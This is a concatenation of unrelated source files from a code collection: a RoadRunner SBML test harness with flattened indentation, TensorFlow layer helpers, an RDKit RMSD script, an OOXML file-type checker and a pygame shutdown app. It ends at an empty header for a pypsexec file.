print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getBoundarySpeciesIds()
m = rrInstance.model.getNumBoundarySpecies()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetGlobalParameterIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getGlobalParameterIds()
m = rrInstance.model.getNumGlobalParameters()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetCompartmentIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getCompartmentIds()
m = rrInstance.model.getNumCompartments()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkReactionIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getReactionIds()
m = rrInstance.model.getNumReactions();
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkFloatingSpeciesInitialConditionIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
line = readLine ()
words = line.split()
expected = rrInstance.model.getFloatingSpeciesInitAmountIds()
print passMsg (words != expected)
def checkEigenValueIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.getEigenvalueIds()
m = rrInstance.model.getNumFloatingSpecies()
for i in range(0,m):
if words[i] != expected[i]:
errorFlag = True
break
print passMsg (errorFlag)
def checkGetRatesOfChangeIds (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
expected = rrInstance.model.getFloatingSpeciesAmountRateIds()
print passMsg (expected != words)
def checkSetSteadyStateSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
m = rrInstance.model.getNumFloatingSpecies()
words = line.split()
result = rrInstance.steadyStateSelections = words
if result == False:
errorFlag = True
print passMsg (errorFlag)
def checkGetSteadyStateSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
    # steadyStateSelections holds selection objects; compare their string forms
    result = [str(x) for x in rrInstance.steadyStateSelections]
    print passMsg (result != words)
def checkSetTimeCourseSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
result = rrInstance.selections = words
if result == False:
errorFlag = True
print passMsg (errorFlag)
def checkGetTimeCourseSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
line = readLine ()
words = line.split()
    # selections holds selection objects; compare their string forms
    result = [str(x) for x in rrInstance.selections]
    print passMsg (result != words)
def checkComputeSteadyStateValues(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
list = rrInstance.steadyStateSelections
ss = rrInstance.computeSteadyStateValues()
words = readLine().split()
for i in range (len (list)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkFloatingSpeciesConcentrations(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getFloatingSpeciesConcentrations()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkBoundarySpeciesConcentrations(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getBoundarySpeciesConcentrations()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkGlobalParameterValues(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getGlobalParameterValues()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkInitalFloatingSpeciesConcentations(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getFloatingSpeciesInitConcentrations()
words = readLine().split()
same = len(words) == len(ss) and \
len(words) == sum([1 for i,j in zip(words,ss) if expectApproximately(float (i), j, 1E-6)])
print passMsg (not same)
def checkReactionRates(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
ss = rrInstance.model.getReactionRates()
words = readLine().split()
for i in range (len (ss)):
if expectApproximately(float (words[i]), ss[i], 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkGetReactionRatesByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
words = readLine().split()
n = rrInstance.model.getNumReactions()
for i in range (n):
value = rrInstance.model.getReactionRate (i)
if expectApproximately(float (words[i]), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def checkNumberOfDependentSpecies(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = int (readLine())
n = rrInstance.model.getNumDepFloatingSpecies()
if n != value:
errorFlag = True
print passMsg (errorFlag)
def checkNumberOfIndependentSpecies(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = int (readLine())
n = rrInstance.model.getNumIndFloatingSpecies()
if n != value:
errorFlag = True
print passMsg (errorFlag)
def checkInitialConditions(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
words = readLine().split()
values = rrInstance.model.getFloatingSpeciesInitConcentrations()
for i in range(len(words)):
if expectApproximately (float (words[i]), values[i], 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def checkNumberOfRules(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = int (readLine())
if rrInstance.getNumRules() != value:
errorFlag = True
print passMsg (errorFlag)
def checkGetRatesOfChange(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
words = readLine().split()
values = rrInstance.model.getRatesOfChange()
for i in range (len(words)):
if expectApproximately (float (words[i]), values[i], 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def checkGetReactionRatesEx (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
inputConcs = asarray (readLine().split(), dtype=float64)
values = rrInstance.getReactionRatesEx (inputConcs)
outputRates = asarray (readLine().split(), dtype=float64)
if not allclose (values, outputRates):
errorFlag = True
print passMsg (errorFlag)
def checkGetRatesOfChangeEx (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
inputConcs = asarray (readLine().split(), dtype=float64)
values = rrInstance.model.getRatesOfChangeEx (inputConcs)
outputRates = asarray (readLine().split(), dtype=float64)
if not allclose (values, outputRates):
errorFlag = True
print passMsg (errorFlag)
def checkRateRateOfChangeByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
inputConcs = asarray (readLine().split(), dtype=float64)
outputRates = asarray (readLine().split(), dtype=float64)
rrInstance.setFloatingSpeciesConcentrations (inputConcs)
for i in range (len (inputConcs)):
value = rrInstance.getRateOfChange (i)
if expectApproximately (value, outputRates[i], 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
# ---------------------------------------------------------------------------
def setGetValues(rrInstance, IdList, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
for i in range (len(IdList)):
value = random.random()*10
        rrInstance.model[IdList[i]] = value
if expectApproximately (rrInstance.model[IdList[i]], value, 1E-6) == False:
errorFlag = True
break
print passMsg (errorFlag)
def setGetTimeStart(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = random.random ()*10
rrInstance.setTimeStart (value)
if expectApproximately (rrInstance.getTimeStart (), value, 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def setGetTimeEnd(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = random.random ()*10
rrInstance.setTimeEnd (value)
if expectApproximately (rrInstance.getTimeEnd (), value, 1E-6) == False:
errorFlag = True
print passMsg (errorFlag)
def setGetNumberOfPoints(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
value = random.randint (1, 100)
rrInstance.setNumPoints (value)
if rrInstance.getNumPoints () != value:
errorFlag = True
print passMsg (errorFlag)
def setGetTimeCourseSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
myList = rrInstance.getFloatingSpeciesIds()
newList = list (myList)
random.shuffle (newList)
rrInstance.setTimeCourseSelectionList (newList)
if rrInstance.getTimeCourseSelectionList() != newList:
errorFlag = True
print passMsg (errorFlag)
def setGetSteadyStateSelectionList(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
myList = rrInstance.getFloatingSpeciesIds()
newList = list (myList)
while newList == myList:
random.shuffle (newList)
rrInstance.setSteadyStateSelectionList (newList)
getList = rrInstance.getSteadyStateSelectionList()
if getList != newList:
errorFlag = True
print passMsg (errorFlag)
def setGetFloatingSpeciesByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumFloatingSpecies()
for i in range (n):
value = random.random()*10
rrInstance.setFloatingSpeciesByIndex (i, value)
if expectApproximately(rrInstance.getFloatingSpeciesByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetBoundarySpeciesByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumBoundarySpecies()
for i in range (n):
value = random.random()*10
rrInstance.setBoundarySpeciesByIndex (i, value)
if expectApproximately(rrInstance.getBoundarySpeciesByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetCompartmentByIndex(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumCompartments()
for i in range (n):
value = random.random()*10
rrInstance.setCompartmentByIndex (i, value)
if expectApproximately(rrInstance.getCompartmentByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetGlobalParameterByIndex (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
n = rrInstance.getNumberOfGlobalParameters()
for i in range (n):
value = random.random()*10
rrInstance.setGlobalParameterByIndex (i, value)
if expectApproximately(rrInstance.getGlobalParameterByIndex (i), value, 1E-6) == False:
errorFlag = True
break;
print passMsg (errorFlag)
def setGetFloatingSpeciesConcentrations (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
getArray = rrInstance.getFloatingSpeciesConcentrations()
setArray = zeros(len(getArray))
for i in range(len(getArray)):
value = random.random()*10
setArray[i] = value
rrInstance.setFloatingSpeciesConcentrations (setArray)
if (setArray != rrInstance.getFloatingSpeciesConcentrations()).all():
errorFlag = True
print passMsg (errorFlag)
def setGetBoundarySpeciesConcentrations (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
getArray = rrInstance.getBoundarySpeciesConcentrations()
setArray = zeros(len(getArray))
for i in range(len(getArray)):
value = random.random()*10
setArray[i] = value
rrInstance.setBoundarySpeciesConcentrations (rrInstance.PythonArrayTorrVector (setArray))
if (setArray != rrInstance.getBoundarySpeciesConcentrations()).all():
errorFlag = True
print passMsg (errorFlag)
def setGetInitialFloatingSpeciesConcentrations (rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
getArray = rrInstance.getFloatingSpeciesInitialConcentrations ()
setArray = zeros(len(getArray))
for i in range(len(getArray)):
value = random.random()*10
setArray[i] = value
rrInstance.setFloatingSpeciesInitialConcentrations (setArray)
if (setArray != rrInstance.getFloatingSpeciesInitialConcentrations()).all():
errorFlag = True
print passMsg (errorFlag)
def setGetReset(rrInstance, testId):
print string.ljust ("Check " + testId, rpadding),
errorFlag = False
values = zeros (rrInstance.getNumberOfFloatingSpecies())
for i in range (len (values)):
values[i] = random.random()*10
initial = rrInstance.getFloatingSpeciesInitialConcentrations()
rrInstance.setFloatingSpeciesConcentrations (values)
    # Should reset the floating species back to their current initial conditions
rrInstance.reset()
values = rrInstance.getFloatingSpeciesConcentrations()
if(values != initial).all():
errorFlag = True
print passMsg (errorFlag)
def scriptTests(rrInstance):
    print
    print "Testing Set and Get Functions"
    print "-----------------------------"
    setGetValues(rrInstance, rrInstance.getFloatingSpeciesIds(), 'Set/Get Value (Floats)')
    setGetValues(rrInstance, rrInstance.getBoundarySpeciesIds(), 'Set/Get Value (Boundary)')
    setGetValues(rrInstance, rrInstance.getGlobalParameterIds(), 'Set/Get Value (Global Parameters)')
    setGetValues(rrInstance, rrInstance.getCompartmentIds(), 'Set/Get Value (Compartments)')
    setGetTimeStart(rrInstance, 'Set/Get TimeStart')
    setGetTimeEnd(rrInstance, 'Set/Get TimeEnd')
    setGetNumberOfPoints(rrInstance, 'Set/Get Number Of Points')
    setGetTimeCourseSelectionList(rrInstance, 'Set/Get Time Course Selection List')
    setGetSteadyStateSelectionList(rrInstance, 'Set/Get Steady State Selection List')
    setGetFloatingSpeciesByIndex(rrInstance, 'Set/Get Floating Species by Index')
    setGetBoundarySpeciesByIndex(rrInstance, 'Set/Get Boundary Species by Index')
    setGetCompartmentByIndex(rrInstance, 'Set/Get Compartment by Index')
    setGetGlobalParameterByIndex(rrInstance, 'Set/Get Global Parameter by Index')
    setGetBoundarySpeciesConcentrations(rrInstance, 'Set/Get Boundary Species Concs')
    setGetFloatingSpeciesConcentrations(rrInstance, 'Set/Get Floating Species Concs')
    setGetInitialFloatingSpeciesConcentrations(rrInstance, 'Set/Get Initial Concs')
    setGetReset(rrInstance, 'Set/Get Reset Method')
# ------------------------------------------------------------------------
# List of tests
functions = {'[Compute Steady State]': myComputeSteadyState,
             # '[Set Steady State Selection List]': mySetSteadyStateSelectionList,
'[Conservation Laws]': setConservationLaw,
'[Species Concentrations]': checkSpeciesConcentrations,
'[Fluxes]': checkFluxes,
'[Full Jacobian]': checkFullJacobian,
'[Eigenvalue Matrix]': checkEigenvalueMatrix,
'[Individual Eigenvalues]': checkIndividualEigenvalues,
'[Stoichiometry Matrix]': checkStoichiometryMatrix,
'[Link Matrix]': checkLinkMatrix,
'[Unscaled Elasticity Matrix]': checkUnscaledElasticityMatrix,
'[Scaled Elasticity Matrix]': checkScaledElasticityMatrix,
'[Unscaled Concentration Control Matrix]': checkUnscaledConcentrationControlMatrix,
'[Unscaled Flux Control Matrix]': checkUnscaledFluxControlCoefficientMatrix,
'[Scaled Concentration Control Matrix]': checkScaledConcentrationControlMatrix,
'[Scaled Flux Control Matrix]': checkScaledFluxControlCoefficientMatrix,
'[Floating Species Ids]': checkGetFloatingSpeciesIds,
'[Boundary Species Ids]': checkGetBoundarySpeciesIds,
'[Global Parameter Ids]': checkGetGlobalParameterIds,
'[Compartment Ids]': checkGetCompartmentIds,
'[Reaction Ids]': checkReactionIds,
'[Species Initial Condition Ids]': checkFloatingSpeciesInitialConditionIds,
'[Get Eigenvalue Ids]': checkEigenValueIds,
'[Get Rates Of Change Ids]': checkGetRatesOfChangeIds,
'[Set Steady State Selection List]': checkSetSteadyStateSelectionList,
'[Get Steady State Selection List]': checkGetSteadyStateSelectionList,
'[Set Time Course Selection List]': checkSetTimeCourseSelectionList,
'[Get Time Course Selection List]': checkGetTimeCourseSelectionList,
# '[Compute Steady State Values]': checkComputeSteadyStateValues,
'[Floating Species Concentrations]': checkFloatingSpeciesConcentrations,
'[Boundary Species Concentrations]': checkBoundarySpeciesConcentrations,
'[Get Global Parameter Values]': checkGlobalParameterValues,
             # '[Get Initial Floating Species Concs]': checkInitalFloatingSpeciesConcentations,  # duplicate key; shadowed by the entry below
'[Get Reaction Rates]': checkReactionRates,
# '[Get Reaction Rate By Index]': checkGetReactionRatesByIndex,
'[Number of Dependent Species]': checkNumberOfDependentSpecies,
'[Number of Independent Species]': checkNumberOfIndependentSpecies,
'[Get Initial Floating Species Concs]': checkInitialConditions,
# '[Get Rates Of Change]': checkGetRatesOfChange,
# '[Get Reaction Rates Ex]': checkGetReactionRatesEx,
# '[Get Rates of Change Ex]': checkGetRatesOfChangeEx,
# '[Get Rate of Change by Index]': checkRateRateOfChangeByIndex,
}
# -----------------------------------------------------------------------
# MAIN START ROUTINE
# -----------------------------------------------------------------------
def runTester (*args):
global fHandle
global sbmlStr
global JarnacStr
if len(args) >= 1:
testModel = args[0]
else:
testModel = defaultTestFilePath()
print "Starting Tester on ", testModel
fHandle = open (testModel, 'r')
sbmlStr = loadSBMLModelFromTestFile ()
JarnacStr = loadJarnacModelFromTestFile ()
print "\n", "Info:"+ "\n"
# Create a roadRunner instance
print "Create roadRunner Instance....."
rrInstance = roadrunner.RoadRunner()
#rrInstance.enableLogging()
info = rrInstance.getInfo()
print info
print
# Load any initialization actions
testId = jumpToNextTest()
if testId == '[INITIALIZATION]':
testId = jumpToNextTest ()
while testId != '[END_INITIALIZATION]':
if functions.has_key(testId):
func = functions[testId]
func (rrInstance, testId)
else:
print 'No initialization function found for ' + testId
testId = jumpToNextTest()
# Load the model into RoadRunner
if rrInstance.load(sbmlStr) == False:
print 'Failed to load model'
#print rrInstance.getLastError()
        raise RuntimeError('Failed to load model')
# Now start the tests proper
testId = jumpToNextTest()
if testId == '[START_TESTS]':
testId = jumpToNextTest()
while testId != '[END_TESTS]':
if functions.has_key(testId):
func = functions[testId]
func(rrInstance, testId)
else:
#getFloatingSpeciesAmountRates
print string.ljust (testId, rpadding), 'NO TEST'
testId = jumpToNextTest()
else:
print 'No Tests found'
#
# scriptTests()
```
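A minimal sketch of driving the harness above (file name hypothetical, and assuming the module is importable as `tester`). The data-file layout is inferred from `jumpToNextTest`/`getSBMLStr`: an `[SBML] ... [END_MODEL]` block, a `[JARNAC] ... [END_MODEL]` block, an optional `[INITIALIZATION] ... [END_INITIALIZATION]` section, then one bracketed test id per section between `[START_TESTS]` and `[END_TESTS]`.
```python
import tester

# falls back to the bundled results_roadRunnerTest_1.txt when no path is given
tester.runTester()
tester.runTester("path/to/my_results_file.txt")  # hypothetical data file
```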
{
"source": "0uO/UNMT-SPR",
"score": 3
} |
#### File: t2tlight/utils/layer.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import tensorflow as tf
from utils.common import infer_shape
def linear(input_data,
output_size,
bias=True,
dtype=None,
scope=None):
"""
output = input_data * W + b
"""
with tf.variable_scope(scope, default_name="linear"):
input_shape = infer_shape(input_data)
input_size = input_shape[-1]
output_shape = tf.concat([input_shape[:-1], [output_size]], axis=0)
W = tf.get_variable("W", shape=[input_size, output_size], dtype=dtype)
output = tf.matmul(tf.reshape(input_data, [-1, input_size]), W)
if bias:
bias = tf.get_variable("b", shape=[output_size], dtype=dtype)
output = output + bias
return tf.reshape(output, output_shape)
def layer_norm(input_data,
epsilon=1e-6,
dtype=None,
scope=None):
with tf.variable_scope(scope, default_name="layer_norm"):
input_size = infer_shape(input_data)[-1]
scale = tf.get_variable("scale", shape=[input_size],
initializer=tf.ones_initializer())
bias = tf.get_variable("bias", shape=[input_size],
                               initializer=tf.zeros_initializer())
mean = tf.reduce_mean(input_data, -1, True)
variance = tf.reduce_mean(tf.square(input_data - mean), -1, True)
input_norm = (input_data - mean) * tf.rsqrt(variance + epsilon)
output = input_norm * scale + bias
return output
def smoothed_softmax_cross_entropy(logits,
labels,
smoothing,
normalize):
if logits is None or labels is None:
raise ValueError("Both logits and labels must be provided")
with tf.name_scope("smoothed_softmax_cross_entropy",
values=[logits, labels]):
labels = tf.reshape(labels, [-1])
if smoothing is None or smoothing == 0.0:
ce = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=labels
)
return ce
# label smoothing
vocab_size = tf.shape(logits)[1]
n = tf.to_float(vocab_size - 1)
p = 1.0 - smoothing
q = smoothing / n
soft_targets = tf.one_hot(tf.cast(labels, tf.int32), depth=vocab_size,
on_value=p, off_value=q)
xentropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits,
labels=soft_targets)
if normalize is False:
return xentropy
# Normalizing constant is the best cross-entropy value with soft targets.
        # We subtract it just for readability; it makes no difference to learning
normalizing = -(p * tf.log(p) + n * q * tf.log(q + 1e-20))
return xentropy - normalizing
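# Worked check of the constant above: with smoothing s over a vocabulary of
# size V, the soft targets put p = 1 - s on the true class and q = s / (V - 1)
# on each of the n = V - 1 other classes, so the best achievable cross-entropy
# is -(p*log(p) + n*q*log(q)); that is exactly what `normalizing` subtracts
# (the 1e-20 is only a numerical guard inside the log).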
def residual_fn(previous_data,
input_data,
dropout_rate=None):
if dropout_rate is not None and dropout_rate > 0.0:
input_data = tf.nn.dropout(input_data, 1 - dropout_rate)
return previous_data + input_data
```
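A quick smoke test for the layers above; a sketch assuming TensorFlow 1.x (matching the `tf.variable_scope`/`tf.get_variable` API used in the file) and that the functions are importable from `utils.layer`. Shapes and scope names are illustrative.
```python
import numpy as np
import tensorflow as tf
from utils.layer import linear, layer_norm, smoothed_softmax_cross_entropy

x = tf.placeholder(tf.float32, shape=[None, 8])
labels = tf.placeholder(tf.int32, shape=[None])
h = layer_norm(linear(x, 16, scope="proj"), scope="ln")  # affine + layer norm
logits = linear(h, 4, scope="out")
# one smoothed cross-entropy value per example
loss = smoothed_softmax_cross_entropy(logits, labels, smoothing=0.1,
                                      normalize=True)

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    print(sess.run(loss, feed_dict={x: np.random.randn(2, 8),
                                    labels: [0, 3]}).shape)  # (2,)
```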
{
"source": "0ut0fcontrol/isoRMSD",
"score": 3
} |
#### File: 0ut0fcontrol/isoRMSD/isoRMSD.py
```python
import math
# rdkit imports
from rdkit import Chem
from rdkit.Chem import AllChem
from rdkit.Chem.AllChem import AlignMol
def GetBestRMSD(probe, ref, refConfId=-1, probeConfId=-1, maps=None, align=True):
"""Returns the optimal RMS for aligning two molecules, taking
symmetry into account. As a side-effect, the probe molecule is
left in the aligned state.
Arguments:
- ref: the reference molecule
- probe: the molecule to be aligned to the reference
- refConfId: (optional) reference conformation to use
- probeConfId: (optional) probe conformation to use
- maps: (optional) a list of lists of (probeAtomId,refAtomId)
tuples with the atom-atom mappings of the two molecules.
If not provided, these will be generated using a substructure
search.
Note:
This function will attempt to align all permutations of matching atom
orders in both molecules, for some molecules it will lead to 'combinatorial
explosion' especially if hydrogens are present.
Use 'rdkit.Chem.AllChem.AlignMol' to align molecules without changing the
atom order.
"""
    # When aligning, the coordinates of the probe will be changed!!!
ref.pos = orginXYZ(ref)
probe.pos = orginXYZ(probe)
try:
name = probe.GetProp("_Name")
except KeyError as e:
name = "NaN"
if not maps:
matches = ref.GetSubstructMatches(probe, uniquify=False)
if not matches:
raise ValueError(
"mol %s does not match mol %s"
% (ref.GetProp("_Name"), probe.GetProp("_Name"))
)
if len(matches) > 1e6:
print(
"{} matches detected for molecule {}, this may lead to a performance slowdown.".format(
len(matches), name
)
)
maps = [list(enumerate(match)) for match in matches]
bestRMSD = 10000.0
for amap in maps:
if align:
rmsd = AlignMol(probe, ref, probeConfId, refConfId, atomMap=amap)
else:
rmsd = RMSD_NotAlign(probe, ref, amap)
bestRMSD = min(bestRMSD, rmsd)
return bestRMSD
# Map is probe -> ref
# [(1:3),(2:5),...,(10,1)]
def RMSD_NotAlign(probe, ref, amap):
rmsd = 0.0
# print(amap)
atomNum = ref.GetNumAtoms() + 0.0
for (pi, ri) in amap:
posp = probe.pos[pi]
posf = ref.pos[ri]
rmsd += dist_2(posp, posf)
rmsd = math.sqrt(rmsd / atomNum)
return rmsd
def dist_2(atoma_xyz, atomb_xyz):
dis2 = 0.0
for i, j in zip(atoma_xyz, atomb_xyz):
dis2 += (i - j) ** 2
return dis2
def orginXYZ(mol):
mol_pos = {}
for i in range(0, mol.GetNumAtoms()):
pos = mol.GetConformer().GetAtomPosition(i)
mol_pos[i] = pos
return mol_pos
if __name__ == "__main__":
import argparse
import pandas as pd
from oddt.toolkits import rdk as toolkit
parser = argparse.ArgumentParser(__doc__)
parser.add_argument(
"-r",
"--reference",
required=True,
help="reference mol in .pdb, .mol2 or .sdf format",
)
parser.add_argument(
"-p", "--probe", required=True, help="probe mols in .pdb, .mol2, or .sdf"
)
parser.add_argument(
"-o",
"--output_csv",
default="rmsd.csv",
help="output rmsd in a csv file, default: rmsd.csv",
)
args = parser.parse_args()
ref_fmt = args.reference.split(".")[-1]
ref_oddt = next(toolkit.readfile(ref_fmt, args.reference))
ref_rdk = Chem.RemoveHs(ref_oddt.Mol)
probe_fmt = args.probe.split(".")[-1]
probe_oddt_supp = toolkit.readfile(probe_fmt, args.probe)
column_names = ["Mol_Name", "RMSD_Align", "RMSD_NotAlign"]
print(column_names)
data = []
for i, probe_oddt in enumerate(probe_oddt_supp):
if probe_oddt is None:
name = "NaN"
rmsd_notalign = 10000.0
rmsd_align = 10000.0
else:
probe_rdk = Chem.RemoveHs(probe_oddt.Mol)
try:
name = probe_rdk.GetProp("_Name")
name = "_".join(name.split())
except KeyError as e:
name = "NaN"
print("\nAssign bond orders from probe to reference.")
            # may emit an RDKit warning: "More than one matching pattern found - picking one"
ref = AllChem.AssignBondOrdersFromTemplate(probe_rdk, ref_rdk)
# order is matter because GetBestRMSD(align=True) will change probe mol.
rmsd_notalign = GetBestRMSD(probe_rdk, ref, align=False)
rmsd_align = GetBestRMSD(probe_rdk, ref, align=True)
print(f"mol{i:04d} {name} {rmsd_align} {rmsd_notalign}")
data.append((name, rmsd_align, rmsd_notalign))
df = pd.DataFrame(data, columns=column_names)
df.index.name = "index"
df.to_csv(args.output_csv)
print(f"\nresult save in {args.output_csv}")
```
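Beyond the CLI above, `GetBestRMSD` can also be called directly; a minimal sketch with hypothetical file names, assuming the module is importable and both structures parse with RDKit and share the same heavy-atom topology:
```python
from rdkit import Chem
from isoRMSD import GetBestRMSD  # assumes the module above is importable

ref = Chem.RemoveHs(Chem.MolFromMolFile("crystal_ligand.sdf"))
probe = Chem.RemoveHs(Chem.MolFromMolFile("docked_pose.sdf"))

# align=True superimposes the probe onto the reference as a side effect,
# so compute the in-place RMSD first.
rmsd_in_place = GetBestRMSD(probe, ref, align=False)
rmsd_aligned = GetBestRMSD(probe, ref, align=True)
print(rmsd_in_place, rmsd_aligned)
```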
{
"source": "0utDoorFr0g/OOXML_auto_analysis",
"score": 3
} |
#### File: 0utDoorFr0g/OOXML_auto_analysis/OOXML_auto_analysis.py
```python
import zipfile
import os
import shutil
class FileInfo:
def __init__(self, path):
self.target_file_path = path
self.unzip_file_path = ""
self.ooxml_file_flag = False
self.ooxml_file_type = "" # {xl | ppt | word}
self.temp_path = ""
if FileInfo.check_pk_zip_signature(self.target_file_path) == True:
self.temp_path = os.path.dirname(self.target_file_path) + "\\" + "temp"
os.makedirs(self.temp_path, exist_ok=True)
self.unzip_file_path = self.temp_path + "\\" + "sample" + os.path.basename(self.target_file_path)
os.mkdir(self.unzip_file_path)
if FileInfo.unzip_file(self.target_file_path, self.unzip_file_path):
if FileInfo.check_ooxml_file(self.unzip_file_path):
self.ooxml_file_flag = True
content_file = open(self.unzip_file_path + "\\" + "[Content_Types].xml","r")
content_data = content_file.read()
content_file.close()
if content_data.find("xl") != -1:
self.ooxml_file_type = "xl"
elif content_data.find("word") != -1:
self.ooxml_file_type = "word"
elif content_data.find("ppt") != -1:
self.ooxml_file_type = "ppt"
else:
self.ooxml_file_type = "another"
def delete_unzip_file(self):
""" delete unziped file package and directory
Args:
Return:
"""
shutil.rmtree(self.unzip_file_path)
@staticmethod
def check_pk_zip_signature(path):
""" check the file has PKZIP signature
Args:
path (string) : file path to check
Return:
bool : if file has PKZIP signature return True, else return False
None : if function raise exception return None
"""
try:
f = open(path,"rb")
file_data = f.read(4)
f.close()
if file_data != b"\x50\x4B\x03\x04":
return False
else:
return True
except:
return None
@staticmethod
def unzip_file(target_path, extract_path):
""" unzip target file to extract_path
Args:
target_path (string) : file path to unzip
extract_path (string) : unziped result will be placed this path
Return:
bool : if function succeed return True else return False
"""
try:
target_handle = zipfile.ZipFile(target_path)
target_handle.extractall(extract_path)
return True
except:
return False
@staticmethod
def check_ooxml_file(path):
""" check the file is OOXML file
Args:
path (string) : path to unziped file to check
Return:
bool : if file is OOXML file return True, else return False
"""
return os.path.isfile(path + "\\" + "[Content_Types].xml")
sample = [FileInfo("C:\\Users\\forgo\\Desktop\\testtt\\abcd" + str(i) + ".zip") for i in range(1,4)]
for i in sample:
print(i.ooxml_file_type)
i.delete_unzip_file()
shutil.rmtree(sample[0].temp_path)
```
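A directory sweep is the more typical use of the `FileInfo` class above; a sketch with a hypothetical sample folder:
```python
import glob
import shutil

infos = [FileInfo(p) for p in glob.glob(r"C:\samples\*")]  # hypothetical path
for info in infos:
    if info.ooxml_file_flag:
        print(info.target_file_path, "->", info.ooxml_file_type)
    if info.unzip_file_path:  # only set for files with a PKZIP signature
        info.delete_unzip_file()
if infos and infos[0].temp_path:
    shutil.rmtree(infos[0].temp_path, ignore_errors=True)
```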
{
"source": "0v3rl0w/didactic-rotary-phone",
"score": 3
} |
#### File: apps/shutdown/main.py
```python
import os
import pygame
from typing import Tuple
class Shutdown:
def __init__(self, size: Tuple[int, int]):
self.screen_res = size
def mainloop(self, event):
if os.environ["dev"] == "dev":
exit()
else:
os.system("poweroff")
def get_surface(self) -> pygame.Surface:
return pygame.Surface(self.screen_res)
def callObject(size: Tuple[int, int]) -> object:
return Shutdown(size)
``` |
{
"source": "0v3rride/pypsexec_mod",
"score": 2
} |
#### File: pypsexec_mod/pypsexec/paexec.py
